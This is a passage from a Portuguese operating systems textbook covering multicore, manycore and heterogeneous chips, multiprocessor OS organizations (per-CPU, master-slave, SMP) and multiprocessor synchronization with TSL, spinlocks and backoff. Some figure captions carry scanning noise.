(Chip MultiProcessors — multiprocessadores em 
chip). A partir de uma perspectiva de software, CMPs 
não são realmente tão diferentes de multiprocessadores 
baseados em barramento ou de multiprocessadores que 
usam redes de comutação. No entanto, existem algumas 
diferenças. Para começo de conversa, em um multipro- 
cessador baseado em barramento, cada uma das CPUs 
tem a sua própria cache, como na Figura 8.2(b) e tam- 
bém como no projeto AMD da Figura 1.8(b). O proje- 
to de cache compartilhado da Figura 1.8(a), que a Intel 
usa em muitos dos seus processadores, não ocorre em 
outros multiprocessadores. Uma cache L2 ou L3 com- 
partilhada pode afetar o desempenho. Se um núcleo pre- 
cisa de uma grande quantidade de memória de cache e 
outros não, esse projeto permite que o núcleo “faminto” 
pegue o que ele precisar. Por outro lado, a cache com- 
partilhada também possibilita que um núcleo ganancio- 
so prejudique os outros. 

Uma área na qual CMPs diferem dos seus pri- 
mos maiores é a tolerância a falhas. Pelo fato de as 
CPUs serem tão proximamente conectadas, falhas em 


componentes compartilhados podem derrubar múltiplas 
CPUs ao mesmo tempo, algo improvável em multipro- 
cessadores tradicionais. 

Além dos chips multinúcleo simétricos, onde todos 
os núcleos são idênticos, outra categoria comum de chip 
multinúcleo é o SoC (System on a Chip — sistema em 
um chip). Esses chips têm uma ou mais CPUs princi- 
pais, mas também núcleos para fins especiais, como 
decodificadores de vídeo e áudio, criptoprocessadores, 
interfaces de rede e mais, levando a um sistema compu- 
tacional completo em um chip. 


Chips com muitos núcleos (manycore) 


Multinucleo significa simplesmente “mais de um nú- 
cleo”, mas quando o número de núcleos cresce bem além 
do alcance da contagem nos dedos, usamos outro nome. 
Chips com muitos núcleos (manycore) são multinúcleos 
que contêm dezenas, centenas, ou mesmo milhares de nú- 
cleos. Embora não exista um limiar claro, além do qual um 
multinúcleo torna-se um chip com muitos núcleos, uma 
distinção fácil que podemos fazer é que você provavel- 
mente tem um chip com muitos núcleos quando não se 
importa de perder um ou dois. 

Placas aceleradoras (accelerator add-on cards) 
como o Xeon Phi da Intel têm mais de 60 núcleos x86. 
Outros vendedores já cruzaram a barreira dos 100 com 
diferentes tipos de núcleos. Mil núcleos de propósito 
geral podem estar a caminho. Não é fácil de imagi- 
nar o que fazer com mil núcleos, muito menos como 
programá-los. 

Outro problema com números realmente grandes 
de núcleos é que o equipamento necessário para man- 
ter suas caches coerentes torna-se muito complicado e 
muito caro. Muitos engenheiros preocupam-se com o 
fato de que a coerência de cache pode não ser escalável 
para muitas centenas de núcleos. Alguns chegam a de- 
fender que devemos abrir mão da ideia completamente. 
Eles temem que o custo dos protocolos de coerência no 
hardware seja tão alto que todos aqueles núcleos novos 
em folha não ajudarão muito o desempenho, pois o pro- 
cessador estará ocupado demais mantendo as caches em 
um estado consistente. Pior, ele teria de gastar memória 
demais no diretório (rápido) para fazê-lo. Essa situação 
é conhecida como parede de coerência. 

Considere, por exemplo, nossa solução de coerência 
de cache baseada no diretório discutida anteriormente. 
Se cada diretório contém um vetor de bits para indicar 
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quais núcleos contêm uma linha de cache em particular, 
a entrada de diretório para uma CPU com 1.024 núcleos 
terá pelo menos 128 bytes de comprimento. Como as 
linhas de cache em si raramente são maiores do que 128 
bytes, isso leva à situação complicada de a entrada de 
diretório ser maior do que a linha de cache que ela con- 
trola. Provavelmente não é o que queremos. 

Alguns engenheiros argumentam que o único mode- 
lo de programação que se provou adequado a números 
muito grandes de processadores é aquele que emprega 
a troca de mensagens e memória distribuída — e é isso 
que deveríamos esperar em futuros chips com muitos 
núcleos também. Processadores experimentais como o 
SCC de 48 núcleos da Intel já abandonaram a consistên- 
cia de cache e forneceram suporte de hardware para a 
troca mais rápida de mensagens em vez disso. Por outro 
lado, outros processadores ainda proporcionam consis- 
tência mesmo em grandes contagens de núcleos. Mode- 
los híbridos também são viáveis. Por exemplo, um chip 
de 1.024 núcleos pode ser dividido em 64 ilhas com 16 
núcleos cada com coerência de cache, enquanto aban- 
dona a coerência de cache entre as ilhas. 

Milhares de núcleos nem são mais tão especiais. Os 
chips com muitos núcleos mais comuns hoje, unidades de 
processamento gráfico, são encontrados em praticamente 
qualquer sistema computacional que não seja embarcado e 
tenha um monitor. Uma GPU (Graphic Processing Unit 
— unidade de processamento gráfico) é um processador 
com memória dedicada e, literalmente, milhares de peque- 
nos núcleos. Comparado com processadores de propósito 
geral, GPUs gastam a maior parte de seu orçamento de 
transistores nos circuitos que realizam cálculos e menos 
em caches e lógica de controle. Elas são muito boas para 
diversas pequenas computações realizadas em paralelo, 
como renderizar polígonos em aplicações gráficas, mas 
não são tão boas em tarefas em série. Também são difíceis 
de programar. Embora GPUs possam ser úteis para siste- 
mas operacionais (por exemplo, codificação ou processa- 
mento de tráfego de rede), não é provável que muito do 
próprio sistema operacional vá executar nas GPUs. 

Outras tarefas computacionais são cada vez mais 
tratadas pelo GPU, em especial tarefas computacional- 
mente exigentes que são comuns na computação cienti- 
fica. O termo usado para o processamento de propósito 
geral em GPUs é — você adivinhou — GPGPU.! Infe- 
lizmente, programar GPUs de maneira eficiente é algo 
extremamente difícil e exige linguagens de programa- 
ção especial como o OpenGL, ou o CUDA de pro- 
priedade da NVIDIA. Uma diferença importante entre 
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programar GPUs e processadores de propósito geral é 
que as GPUs são essencialmente máquinas de “dados 
múltiplos e instrução única”, o que significa que um 
grande número de núcleos executa exatamente a mesma 
instrução, mas em fragmentos diferentes de dados. Esse 
modelo de programação é ótimo para o paralelismo de 
dados, mas nem sempre conveniente para outros estilos 
de programação (como o paralelismo de tarefas). 


Multinúcleos heterogêneos 


Alguns chips integram uma GPU e uma série de nú- 
cleos de propósito geral na mesma pastilha. De modo 
similar, muitos SoCs contêm núcleos de propósito geral 
além de um ou mais processadores de propósitos espe- 
ciais. Sistemas que integram múltiplos tipos diferentes 
de processadores em um único chip são conhecidos co- 
letivamente como processadores multinúcleos hetero- 
gêneos. Um exemplo de um processador multinúcleo 
heterogêneo é a linha de processadores de rede IXP in- 
troduzida pela Intel em 2000 e atualizada regularmente 
com a última tecnologia de ponta. Os processadores de 
rede tipicamente contêm um único núcleo de controle 
de propósito geral (por exemplo, um processador ARM 
executando Linux) e muitas dezenas de processadores de 
fluxo (stream processors) altamente especializados que 
são bons de verdade em processar pacotes de rede e não 
muito mais. Eles costumam ser usados em equipamentos 
de rede, como roteadores e firewalls. Para rotear pacotes 
de rede você provavelmente não precisa muito de opera- 
ções de ponto flutuante, então na maioria dos modelos os 
processadores de fluxo não têm unidade de ponto flutu- 
ante alguma. Por outro lado, o roteamento em alta veloci- 
dade é altamente dependente do acesso rápido à memória 
(para ler dados de pacote) e os processadores de fluxo 
têm um hardware especial para tornar isso possível. 

Nos exemplos anteriores, os sistemas eram clara- 
mente heterogêneos. Os processadores de fluxo e os 
processadores de controle nos IXPs são “animais” com- 
pletamente diferentes com conjuntos de instruções dife- 
rentes. O mesmo é verdade para o GPU e os núcleos de 
propósito geral. No entanto, também é possível intro- 
duzir a heterogeneidade enquanto se mantém o mesmo 
conjunto de instruções. Por exemplo, uma CPU pode ter 
um pequeno número de núcleos “grandes”, com pipeli- 
nes profundos e possivelmente velocidades de relógio 
altas, e um número maior de núcleos “pequenos” que 
são mais simples, menos poderosos e talvez executem 
em frequências mais baixas. Os núcleos poderosos são 
necessários para executar códigos que exigem processa- 
mento sequencial rápido, enquanto os núcleos pequenos 


são úteis para tarefas que podem ser executadas com 
eficiência em paralelo. Um exemplo de uma arquitetura 
heterogênea ao longo dessas linhas é a família de pro- 
cessadores big.LITTLE da ARM. 


Programação com múltiplos núcleos 


Como aconteceu muitas vezes no passado, o hardwa- 
re está bem à frente do software. Embora os chips multi- 
núcleos estejam aqui agora, nossa capacidade de escrever 
aplicações para eles não está. Linguagens de programação 
atuais não são muito adequadas para escrever programas 
altamente paralelos e bons compiladores e ferramentas 
de depuração ainda são escassas. Poucos programado- 
res tiveram alguma experiência com a programação em 
paralelo e a maioria sabe pouco sobre dividir o trabalho 
em múltiplos pacotes que podem executar em paralelo. A 
sincronização, eliminando condições de corrida, e a evi- 
tação de impasses são um verdadeiro pesadelo, mas infe- 
lizmente o desempenho sofre demais se elas não forem 
bem tratadas. Semáforos não são a resposta. 

Além desses problemas iniciais, realmente não fa- 
zemos ideia de que tipo de aplicação precisa para va- 
ler centenas, muito menos milhares, de núcleos — em 
especial em ambientes caseiros. Em grandes centros 
de servidores, por outro lado, há muito trabalho para 
grandes números de núcleos. Por exemplo, um servi- 
dor popular pode facilmente usar um núcleo diferente 
para cada solicitação de cliente. De modo similar, os 
provedores na nuvem discutidos no capítulo anterior 
podem carregar os núcleos para proporcionar um gran- 
de número de máquinas virtuais para alugar para os 
clientes que procuram por potência computacional sob 
demanda. 


8.1.2 Tipos de sistemas operacionais para 
multiprocessadores 


Vamos então passar do hardware de multiprocessa- 
dores para o software de multiprocessadores, em par- 
ticular, sistemas operacionais de multiprocessadores. 
Várias abordagens são possíveis. A seguir estudaremos 
três delas. Observe que todas são igualmente aplicá- 
veis a sistemas multinúcleos, assim como sistemas com 
CPUs discretas. 


Cada CPU tem o seu próprio sistema operacional 


A maneira mais simples possível de organizar um 
sistema operacional de multiprocessadores é dividir 


estaticamente a memória em um número de partições 
igual ao de CPUs, e dar a cada CPU sua própria memó- 
ria privada e sua própria cópia privada do sistema ope- 
racional. Na realidade, as n CPUs então operam como 
n computadores independentes. Uma otimização óbvia 
é permitir que todas compartilhem o código do sistema 
operacional e façam cópias privadas apenas das estru- 
turas de dados do sistema operacional, como mostrado 
na Figura 8.7. 

Esse esquema é ainda melhor do que ter n compu- 
tadores separados, já que ele permite que todas as má- 
quinas compartilhem um conjunto de discos e outros 
dispositivos de E/S, e também permite que a memória 
seja compartilhada de maneira flexível. Por exemplo, 
mesmo com a alocação de memória estática, uma CPU 
pode receber uma porção extragrande da memória, en- 
tão pode lidar com grandes programas de maneira efi- 
ciente. Além disso, processos podem comunicar-se com 
eficiência um com o outro ao permitir que um produtor 
escreva dados diretamente na memória e permitindo 
que um consumidor a busque do lugar em que o produ- 
tor a escreveu. Ainda assim, a partir da perspectiva do 
sistema operacional, cada CPU ter o seu próprio sistema 
operacional é algo bastante primitivo. 

Vale a pena mencionar quatro aspectos desse proje- 
to que talvez não sejam óbvios. Primeiro, quando um 
processo faz uma chamada de sistema, ela é capturada 
e tratada na sua própria CPU usando as estruturas de 
dados nas tabelas daquele sistema operacional. 

Segundo, tendo em vista que cada sistema opera- 
cional tem as suas próprias tabelas, ele também tem 
seu próprio conjunto de processos que escalona para si 
mesmo. Não há compartilhamento de processos. Se um 
usuário entra na CPU 1, todos os seus processos são 
executados na CPU 1. Em consequência, pode aconte- 
cer de a CPU 1 estar ociosa enquanto a CPU 2 está car- 
regada de trabalho. 

Terceiro, não há compartilhamento de páginas físicas. 
Pode acontecer de a CPU 1 ter páginas de sobra enquanto 
a CPU 2 está paginando continuamente. Não há como a 
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CPU 2 tomar emprestadas algumas páginas da CPU 1, 
pois a alocação de memória é fixa. 

Quarto, e pior, se o sistema operacional mantém uma 
cache de buffer de blocos de disco recentemente usados, 
cada sistema operacional faz isso independentemente 
dos outros. Desse modo, pode acontecer de um determi- 
nado bloco de disco estar presente e sujo em múltiplas 
caches de buffer ao mesmo tempo, levando a resultados 
inconsistentes. A única maneira de evitar esse problema 
é eliminar as caches de buffer. Fazê-lo não é dificil, mas 
prejudica consideravelmente o desempenho. 

Por essas razões, esse modelo raramente é usado em 
sistemas de produção, embora ele tenha sido nos pri- 
meiros dias dos multiprocessadores, quando o objetivo 
era viabilizar o mais rápido possível os sistemas ope- 
racionais existentes para alguns multiprocessadores no- 
vos. Em pesquisas, o modelo está fazendo um retorno, 
mas com todo tipo de mudanças. Há um ponto a ser 
destacado a respeito da manutenção dos sistemas opera- 
cionais completamente separados. Se todo o estado para 
cada processador for mantido local para aquele proces- 
sador, haverá pouco ou nenhum compartilhamento que 
leve a problemas de consistência ou necessidade de ex- 
clusão mútua. De maneira inversa, se múltiplos proces- 
sadores têm de acessar e modificar a mesma tabela de 
processos, o gerenciamento da exclusão mútua torna-se 
complicado rapidamente (e crucial para o desempenho). 
Falaremos mais a respeito quando discutiremos o mo- 
delo de multiprocessador simétrico. 


Multiprocessadores “mestre-escravo” 


Um segundo modelo é mostrado na Figura 8.8. Aqui, 
uma cópia do sistema operacional e de suas tabelas está 
presente na CPU 1 e não em nenhuma das outras. Todas 
as chamadas de sistema são redirecionadas para a CPU 1 
para serem processadas ali. A CPU 1 também pode exe- 
cutar processos do usuário se restar tempo da CPU. Esse 
modelo é chamado de mestre-escravo, tendo em vista que 
a CPU 1 é a mestre e todos os outros são escravos. 


(eil: TE: Particionamento da memória de um multiprocessador entre as quatro CPUs, mas compartilhando somente uma cópia do código do 
sistema operacional. As caixas identificadas como “Dados” contêm os dados particulares do sistema operacional para cada CPU. 
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e K:K:] Um modelo de multiprocessadores mestre-escravo. 
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O modelo mestre-escravo soluciona a maioria dos 
problemas do primeiro modelo. Há uma única estrutu- 
ra de dados (por exemplo, uma lista ou um conjunto de 
listas priorizadas) que mantém o controle dos processos 
prontos. Quando uma CPU fica ociosa, ela pede ao sis- 
tema operacional na CPU 1 um processo para executar e 
ele Ihe aloca um. Desse modo, jamais pode acontecer de 
uma CPU estar ociosa enquanto outra está sobrecarrega- 
da. De modo similar, páginas podem ser alocadas entre 
todos os processos dinamicamente e há apenas uma ca- 
che de buffer, então inconsistências jamais ocorrem. 

O problema com esse modelo é que com muitas 
CPUs, o mestre tornar-se-á um gargalo. Afinal de con- 
tas, ele tem de lidar com todas as chamadas de sistema 
de todas as CPUs. Se, digamos, 10% de todo o tempo 
for gasto lidando com chamadas do sistema, então 10 
CPUs praticamente saturarão o mestre, e com 20 CPUs 
ele estará completamente sobrecarregado. Assim, esse 
modelo é simples e executável para pequenos multipro- 
cessadores, mas para os grandes ele falha. 


Multiprocessadores simétricos 


Nosso terceiro modelo, o SMP (Symmetric Multi- 
Processor — multiprocessador simétrico), elimina essa 
assimetria. Há uma cópia do sistema operacional na 
memória, mas qualquer CPU pode executá-lo. Quando 
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uma chamada de sistema é feita, a CPU na qual ela foi 
feita chaveia para o núcleo e processa a chamada. O 
modelo SMP está ilustrado na Figura 8.9. 

Esse modelo equilibra processos e a memória di- 
namicamente, tendo em vista que há apenas um con- 
junto de tabelas do sistema operacional. Ele também 
elimina o gargalo da CPU mestre, já que não há mes- 
tre, mas ele introduz os seus próprios problemas. Em 
particular, se duas ou mais CPUs estão executando o 
código do sistema operacional ao mesmo tempo, pode 
ocorrer um desastre. Imagine CPUs simultaneamente 
escolhendo o mesmo processo para executar ou reivin- 
dicando a mesma página de memória livre. A maneira 
mais simples em torno desses problemas é associar um 
mutex (isto é, variável de travamento) ao sistema ope- 
racional, tornando todo o sistema uma grande região 
crítica. Quando uma CPU quer executar um código de 
sistema operacional, ela tem de adquirir o mutex pri- 
meiro. Se o mutex estiver travado, ela simplesmente 
espera. Dessa maneira, qualquer CPU pode executar 
o sistema operacional, mas apenas uma de cada vez. 
Essa abordagem é algo chamado de grande trava de 
núcleo (big kernel lock). 

Esse modelo funciona, mas é quase tão ruim quanto 
o modelo mestre-escravo. De novo, suponha que 10% 
de todo o tempo de execução seja gasto dentro do sis- 
tema operacional. Com 20 CPUs, haverá longas filas 
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de CPUs querendo entrar. Felizmente, é fácil melhorar 
isso. Muitas partes do sistema operacional são indepen- 
dentes umas das outras. Por exemplo, não há problema 
com uma CPU executando o escalonador enquanto ou- 
tra CPU está lidando com uma chamada do sistema de 
arquivos e uma terceira está processando uma falta de 
página. 

Essa observação leva à divisão do sistema opera- 
cional em múltiplas regiões críticas independentes que 
não interagem umas com as outras. Cada região cri- 
tica é protegida por seu próprio mutex, então apenas 
uma CPU de cada vez pode executá-la. Dessa maneira, 
muito mais paralelismo pode ser conseguido. No en- 
tanto, pode muito bem acontecer de algumas tabelas, 
como a de processos, serem usadas por múltiplas re- 
giões críticas. Por exemplo, a tabela de processos é 
necessária para o escalonamento, mas também para a 
chamada de sistema fork, assim como o tratamento de 
sinais. Cada tabela que pode ser usada por múltiplas 
regiões críticas precisa do seu próprio mutex. Dessa 
maneira, cada região crítica pode ser executada e cada 
tabela crítica pode ser acessada por apenas uma CPU 
de cada vez. 

A maioria dos multiprocessadores modernos usa 
esse arranjo. O que complica a escrita do sistema opera- 
cional para uma máquina dessas não é que o código real 
seja tão diferente de um sistema operacional regular, a 
parte difícil é dividi-la em regiões críticas que podem 
ser executadas simultaneamente por diferentes CPUs 
sem que uma interfira com a outra, nem mesmo de ma- 
neiras indiretas ou sutis. Além disso, toda tabela usada 
por duas ou mais regiões críticas deve ser protegida por 
um mutex e todo código usando a tabela deve usar o 
mutex corretamente. 

Além disso, um grande cuidado deve ser tomado 
para evitar impasses. Se duas regiões críticas precisam 
ambas da tabela 4 e da tabela B, e uma delas reivindica 
a tabela 4 primeiro e a outra reivindica a tabela B pri- 
meiro, mais cedo ou mais tarde um impasse ocorrerá 
e ninguém saberá por quê. Na teoria, todas as tabelas 
poderiam ser associadas a números inteiros e todas as 
regiões críticas poderiam ser solicitadas a adquirir tabe- 
las em ordem crescente. Essa estratégia evita impasses, 
mas exige que o programador pense muito cuidadosa- 
mente a respeito de quais tabelas cada região crítica pre- 
cisa e faça as solicitações na ordem certa. 

À medida que o código se desenvolve com o tempo, 
uma região crítica pode precisar de uma nova tabela da 
qual não necessitava antes. Se o programador é novo e 
não compreende a lógica completa do sistema, então a 
tentação será simplesmente pegar o mutex na tabela no 
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ponto em que ele é necessário e liberá-lo quando não 
mais o for. Por mais razoável que isso possa parecer, 
isso pode levar a impasses, que o usuário perceberá 
como congelamento do sistema. Programar o sistema de 
maneira correta não é fácil e mantê-lo corretamente por 
um período de anos diante de diferentes programadores 
é muito dificil. 


8.1.3 Sincronização de multiprocessadores 


As CPUs em um multiprocessador frequentemente 
precisam ser sincronizadas. Acabamos de ver o caso no 
qual regiões críticas do núcleo e tabelas precisam ser 
protegidas por mutexes. Vamos agora examinar de per- 
to como essa sincronização realmente funciona em um 
multiprocessador. Trata-se de algo distante do trivial, 
como veremos em breve. 

Para começo de conversa, primitivas de sincroniza- 
ção adequadas são realmente necessárias. Se um pro- 
cesso em uma máquina uniprocessadora (apenas uma 
CPU) realiza uma chamada de sistema que exige aces- 
sar alguma tabela de núcleo crítica, o código de núcleo 
pode simplesmente desabilitar as interrupções antes de 
tocar na tabela. Ele pode então fazer seu trabalho sa- 
bendo que será capaz de terminar sem a intromissão de 
qualquer outro processo querendo tocar a tabela antes 
de estar terminada. Em um multiprocessador, desabili- 
tar interrupções afeta apenas a CPU realizando a tarefa. 
Outras CPUs continuam a executar e ainda podem tocar 
a tabela crítica. Em consequência, um protocolo de mu- 
tex apropriado deve ser usado e respeitado por todas as 
CPUs para garantir que a exclusão mútua funcione. 

O cerne de qualquer protocolo de mutex prático 
é uma instrução especial que permite que uma pala- 
vra de memória seja inspecionada e ajustada em uma 
operação indivisível. Vimos como o TSL (Test and Set 
Lock) foi usado na Figura 2.25 para implementar re- 
giões críticas. Como já discutimos, o que essa instru- 
ção faz é ler uma palavra de memória e armazená-la 
em um registrador. Em simultâneo, ela escreve um 1 
(ou algum outro valor que não seja zero) na palavra 
de memória. É claro, são necessários dois ciclos de 
barramento para realizar a leitura e a escrita de memó- 
ria. Em um uniprocessador, enquanto a instrução não 
puder ser interrompida no meio do caminho, o TSL 
sempre funciona como o esperado. 

Agora pense sobre o que poderia acontecer em um 
multiprocessador. Na Figura 8.10, vemos o pior cenário 
possível, no qual a palavra de memória 1.000, sendo 
usada como uma trava, é inicialmente 0. No passo 1, a 
CPU 1 lê a palavra e recebe um 0. No passo 2, antes que 
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(eU IR: o] A instrução TSL pode falhar se o barramento não puder ser travado. Esses quatro passos mostram uma sequência de eventos 


onde a falha é demonstrada. 


Palavra 
1000 é 
inicialmente O 


CPU 1 





1.CPU 1 lé0 


3. CPU 1 escreve 1 


a CPU 1 tenha uma chance de reescrever a palavra para 
1, a CPU 2 entra e também lê a palavra como um 0. No 
passo 3, a CPU 1 escreve um 1 na palavra. No passo 4, 
a CPU 2 também escreve um 1 na palavra. Ambas as 
CPUs receberam um 0 de volta da instrução TSL, então 
ambas agora têm acesso à região crítica e à exclusão 
mútua falha. 

Para evitar esse problema, a instrução TSL tem de 
primeiro travar o barramento, evitando que outras CPUs 
o acessem, então realizar ambos os acessos de memó- 
ria e em seguida destravar o barramento. Em geral, o 
travamento do barramento é feito com a solicitação do 
barramento usando o protocolo de solicitação de barra- 
mento usual, então sinalizando (isto é, ajustando para 
um valor lógico 1) alguma linha de barramento espe- 
cial até que ambos os ciclos tenham sido completados. 
Enquanto essa linha especial estiver sendo sinalizada, 
nenhuma outra CPU terá o direito de acesso ao barra- 
mento. Essa instrução só pode ser implementada em um 
barramento que tenha as linhas necessárias e o proto- 
colo (de hardware) para usá-las. Todos os barramentos 
modernos apresentam essas facilidades, mas nos pri- 
meiros que não as tinham, não era possível implementar 
o TSL corretamente. Essa é a razão por que o protocolo 
de Peterson foi inventado: para sincronizar inteiramente 
em software (PETERSON, 1981). 

Se o TSL for corretamente implementado e usado, ele 
garante que a exclusão mútua pode funcionar. No entan- 
to, esse método de exclusão mútua usa uma trava gira- 
tória, porque a CPU requisitante apenas permanece em 
um laço estreito testando a variável de travamento o mais 
rápido que ela pode. Não apenas ele desperdiça comple- 
tamente o tempo da CPU requisitante (ou CPUs), como 
também coloca uma carga enorme sobre o barramento 
ou memória, desacelerando seriamente todas as outras 
CPUs que estão tentando realizar seu trabalho normal. 

À primeira vista, pode parecer que a presença do ar- 
mazenamento em cache deveria eliminar o problema da 
contenção de barramento, mas não elimina. Na teoria, 
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Barramento 


assim que a CPU requisitante ler a palavra com a vari- 
ável de travamento, ele deve receber uma cópia na sua 
cache. Enquanto nenhuma outra CPU tentar usar a va- 
riável, a CPU requisitante deve ser capaz de executar a 
partir da sua própria cache. Quando a CPU que detém 
a variável escreve um 0 para ela para liberá-la, o proto- 
colo de cache automaticamente invalida todas as cópias 
em caches remotas, exigindo que os valores corretos se- 
jam buscados novamente 

O problema é que as caches operam em blocos de 32 
ou 64 bytes. Em geral, as palavras ao redor da variável 
de travamento são necessárias para a CPU que o detém. 
Já que a instrução TSL é uma escrita (porque modifica 
o travamento), ela precisa do acesso exclusivo ao blo- 
co da cache que contém a variável. Portanto, todo TSL 
invalida o bloco na cache do proprietário da variável e 
busca uma cópia privada, exclusiva, para a CPU soli- 
citante. Tão logo o proprietário da variável toca uma 
palavra adjacente à variável, o bloco da cache é movido 
para sua máquina. Em consequência, todo o bloco da 
cache que contém a variável de travamento está cons- 
tantemente viajando entre o proprietário e o requerente 
da variável de travamento, gerando mais tráfego de bar- 
ramento ainda do que ocorreria com leituras individuais 
da palavra da variável de travamento. 

Se pudéssemos nos livrar de todas essas escritas in- 
duzidas pelo TSL no lado requisitante, poderíamos re- 
duzir consideravelmente a ultrapaginação (thrashing) 
na cache. Essa meta pode ser alcançada se a CPU re- 
querente fizer primeiro uma leitura pura para ver se a 
variável de travamento está livre. Apenas se a variável 
parecer livre é que o TSL vai realmente adquiri-la. O 
resultado dessa pequena mudança é que a maioria das 
negociações são agora leituras em vez de escritas. Se 
a CPU que detém a variável estiver apenas lendo as 
variáveis no mesmo bloco da cache, cada uma poderá 
ter uma cópia do bloco da cache no modo somente de 
leitura compartilhado, eliminando todas as transferên- 
cias do bloco da cache. 


Quando a variável de travamento é por fim liberada, 
o proprietário faz uma escrita, que exige acesso exclusi- 
vo, eliminando assim todas as cópias em caches remo- 
tas. Na leitura seguinte da CPU requerente, o bloco da 
cache será recarregado. Observe que se duas ou mais 
CPUs estão disputando a mesma variável, pode acon- 
tecer de ambas a verem como livre simultaneamente, 
e ambas executarem um TSL simultaneamente para 
adquiri-la. Apenas um desses terá sucesso, então não há 
uma condição de corrida aqui, pois a aquisição real é 
feita pela instrução TSL, e ela é atômica. Ver que uma 
variável de travamento está livre e então tentar agarrá-la 
imediatamente com um TSL não garante que você o pe- 
gará. Alguém mais poderá vencer, mas para a correção 
do algoritmo não importa quem o fará. O sucesso na 
leitura pura é uma mera dica de que esse seria um bom 
momento para tentar adquirir a variável de travamento, 
mas não é uma garantia de que a aquisição terá sucesso. 

Outra maneira de reduzir o tráfego de barramento 
é usar o famoso algoritmo de recuo exponencial biná- 
rio (binary exponential backoff) do padrão Ethernet 
(ANDERSON, 1990). Em vez de testar continuamente, 
como na Figura 2.25, um laco de atraso pode ser inserido 
entre as tentativas. De início, o atraso é de uma instru- 
ção. Se o travamento ainda estiver ocupado, o atraso é 
dobrado para duas instruções, então quatro instruções, e 
assim por diante até algum máximo. Um máximo baixo 
proporciona uma resposta rápida quando o travamento é 
liberado, mas desperdiça mais ciclos de barramento em 
ultrapaginação de cache. Um máximo alto reduz a ul- 
trapaginação de cache à custa da não observação de que 
a variável de travamento está livre tão rapidamente. O 
recuo exponencial binário pode ser usado com ou sem 
as leituras puras precedendo a instrução TSL. 

Uma ideia ainda melhor é dar a cada CPU que dese- 
ja adquirir o mutex sua própria variável de travamento 
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privada para teste, como ilustrado na Figura 8.11 
(MELLOR-CRUMMEY e SCOTT, 1991). A varia- 
vel deve residir em um bloco de cache não utilizado 
diferente para evitar conflitos. O algoritmo funciona 
fazendo que a CPU que falha em adquirir uma trava 
aloque uma variável de travamento e junte-se ao fim 
de uma lista de CPUs esperando pela trava. Quando 
a atual detentora da trava sair da região crítica, ela li- 
bera a variável privada que a primeira CPU na lista 
está testando (na sua própria cache). Essa CPU então 
adentra a região crítica. Quando ela finaliza, ela libera 
a variável que a sua sucessora está usando, e assim 
por diante. Embora o protocolo seja de certa maneira 
complicado (para evitar que duas CPUs se juntem ao 
fim da lista simultaneamente), ele é eficiente e livre 
de inanição. Para todos os detalhes, os leitores devem 
consultar o estudo mencionado. 


Teste contínuo versus chaveamento 


Até o momento, presumimos que uma CPU preci- 
sando de um mutex impedido apenas espera por ele, tes- 
tando intermitentemente, ou ligando-se a uma lista de 
CPUs à espera. Às vezes, não há uma alternativa para a 
CPU requisitante que não seja esperar. Por exemplo, su- 
ponha que alguma CPU esteja ociosa e precise acessar 
a lista compartilhada de processos prontos para obter 
um processo para executar. Se a lista estiver bloqueada, 
a CPU não pode simplesmente decidir suspender o que 
ela está fazendo e executar outro processo, pois fazer 
isso exigiria ler a lista de processos prontos. Ela tem de 
esperar até poder adquirir a lista. 

No entanto, em outros casos, há uma escolha. Por 
exemplo, se algum thread em uma CPU precisa aces- 
sar a cache de buffer do sistema de arquivos e ela está 


ae TESEI Uso de múltiplas variáveis de travamento para evitar a sobrecarga de cache. 
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travada no momento, a CPU pode decidir chavear para 
um thread diferente em vez de esperar. A decisão sobre 
se é melhor esperar ou fazer um chaveamento de thread 
tem servido de matéria para muita pesquisa, parte da 
qual discutiremos a seguir. Observe que essa questão 
não ocorre em um uniprocessador porque a espera não 
tem sentido quando não há outra CPU para liberar a va- 
riável de travamento. Se um thread tenta adquirir uma 
variável de travamento e falha, ele será sempre bloque- 
ado para dar oportunidade ao proprietário da variável de 
ser executado e liberá-la. 

Presumindo que o teste contínuo e o chaveamento de 
thread sejam ambas opções possíveis, a análise de cus- 
to-benefício entre os dois pode ser feita como a seguir. 
O teste contínuo desperdiça ciclos da CPU diretamente. 
Testar uma variável de travamento não é um trabalho 
produtivo. O chaveamento, no entanto, também des- 
perdiça ciclos da CPU, tendo em vista que o estado do 
thread atual deve ser salvo, a variável de travamento na 
lista de processos prontos deve ser adquirida, um thread 
deve ser escolhido, o seu estado deve ser carregado e 
ele deve ser inicializado. Além disso, a cache da CPU 
conterá todos os blocos errados, então muitas faltas 
de cache de alto custo ocorrerão à medida que o novo 
thread começar a executar. Faltas de TLB também são 
prováveis. Em consequência, deve ocorrer um chavea- 
mento de volta para o thread original, seguido de mais 
faltas na cache. Os ciclos gastos para realizar esses dois 
chaveamentos de contexto mais todas as faltas na cache 
são desperdiçados. 

Se sabemos que os mutexes geralmente são manti- 
dos por, digamos, 50 us e é necessário 1 ms para cha- 
vear do thread atual e 1 ms para chavear de volta mais 
tarde, simplesmente esperar pelo mutex é uma alterna- 
tiva mais eficiente. Por outro lado, se o mutex médio 
for mantido por 10 ms, vale o trabalho de realizar dois 
chaveamentos de contexto. O problema é que regiões 
críticas podem variar consideravelmente em sua dura- 
ção, então qual é a melhor abordagem? 

Uma alternativa é sempre realizar o teste contínuo. 
Uma segunda alternativa é sempre chavear. Mas uma 
terceira alternativa é tomar uma decisão independente 
cada vez que um mutex travado for encontrado. No mo- 
mento em que a decisão precisa ser tomada, não se sabe 
se é melhor testar ou chavear, mas para qualquer dado 
sistema, é possível anotar todas as atividades e analisá- 
-las mais tarde off-line. Então é possível dizer em re- 
trospectiva qual decisão foi a melhor e quanto tempo foi 
desperdiçado no melhor caso. Esse algoritmo de “espe- 
lho retrovisor” torna-se assim uma referência contra a 
qual algoritmos exequíveis podem ser mensurados. 


Esse problema foi estudado por pesquisadores por 
décadas (OUSTERHOUT, 1982). A maioria dos traba- 
lhos usa um modelo no qual um thread que não con- 
segue adquirir um mutex espera por algum tempo. Se 
esse limite de tempo for ultrapassado, ele chaveia. Em 
alguns casos, o limite é fixo, tipicamente a sobrecarga 
conhecida por chavear para outro thread e então chavear 
de volta. Em outros casos é dinâmico, dependendo do 
histórico do mutex que está sendo esperado. 

Os melhores resultados são atingidos quando o siste- 
ma mantém o controle dos últimos tempos de espera ob- 
servados e presume que este será similar aos anteriores. 
Por exemplo, presumindo um tempo de chaveamento 
de contexto de 1 ms novamente, um thread deve esperar 
por um máximo de 2 ms, mas observa quanto tempo de 
fato esperou. Se ele não conseguir adquirir uma variável 
de travamento e ver que nas três tentativas anteriores ele 
esperou uma média de 200 us, ele deve esperar por 2 ms 
